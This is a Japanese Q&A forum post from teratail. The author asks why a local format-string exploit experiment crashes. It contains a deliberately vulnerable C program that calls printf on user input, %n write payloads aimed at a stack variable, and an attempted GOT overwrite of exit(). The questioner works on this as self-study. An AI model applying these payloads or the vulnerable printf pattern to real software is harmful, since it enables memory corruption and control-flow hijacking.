質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.50%
C

C言語は、1972年にAT&Tベル研究所の、デニス・リッチーが主体となって作成したプログラミング言語です。 B言語の後継言語として開発されたことからC言語と命名。そのため、表記法などはB言語やALGOLに近いとされています。 Cの拡張版であるC++言語とともに、現在世界中でもっとも普及されているプログラミング言語です。

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

Q&A

0回答

1505閲覧

セキュリティの実験がうまくいきません。パート2

strike1217

総合スコア651

C

C言語は、1972年にAT&Tベル研究所の、デニス・リッチーが主体となって作成したプログラミング言語です。 B言語の後継言語として開発されたことからC言語と命名。そのため、表記法などはB言語やALGOLに近いとされています。 Cの拡張版であるC++言語とともに、現在世界中でもっとも普及されているプログラミング言語です。

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

0グッド

2クリップ

投稿2016/12/08 12:08

前回よりレベルアップ致しました。
主にアドレス表現がうまくいきません。

参考URL↓
リンク内容

実験コードは以下のようにしました。

C

1#include <stdio.h> 2#include <stdlib.h> 3#include <string.h> 4 5int main(int argc, char *argv[]) 6{ 7 char text[1024] = {0}; 8 int test_val = -72; 9 strcpy(text, argv[1]); 10 11 printf("正しい方法:\n"); 12 printf("%s", text); 13 14 printf("\n誤った方法:\n"); 15 printf(text); 16 17 printf("\n"); 18 19 // Debug output 20 printf("[*] test_val @ 0x%08x = %d 0x%08x\n", (unsigned int)&test_val, test_val, test_val); 21 printf("[*] text @ 0x%08x = %u 0x%08x\n", (unsigned int)text, *((unsigned int *)text), *((unsigned int *)text)); 22 exit(0); 23}

#1、test_valのアドレスの書き換えです。
64bitでコンパイルしました。Linux環境でALSR無効状態です。
[*] test_val @ 0xffffdd9c = -72 0xffffffb8

./test %10$n$(printf "\x9c\xdd\xff\xff")
これだとsegmentation fault になってしまいます。

参考URLを元に
./test "%10$n\x9c\xdd\xff\xff"
これも同じく、segmentation faultになってしまいます。

どうすれば、よいでしょうか??

#2、GOT overwriteでexit()のアドレスを別のアドレスに書き換えたい。
こちらは、32bit環境でおこないました。

exit()のアドレスを0xffffffeeというアドレスに書き換えたいのです。
objdump -R ./test32
とやると、

exit() : 0x00002018

と出てしまいました。
これでは、0があるので、できません。
これは諦めるしかないんでしょうか?

一応、やってみました。
./fmt_vuln $(printf \x1a\x20\x00\x00\x18\x20\x00\x00)%65527x%8$hn%56249x%9$hn

これでは、segmentation faultになります。

どうすれば、よいでしょうか??
おしえてください。

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

ikedas

2016/12/08 12:21

まず参考ページでやっていることを自分でもやってみて、きちんと理解してはどうですか。前の質問で私がコメントした通り、gdbを使ってメモリの内容を確認していますが、やってみたのでしょうか。やっていないのなら、自分なりの工夫を加えるのはそのあとでは?
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

まだ回答がついていません

会員登録して回答してみよう

アカウントをお持ちの方は

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.50%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問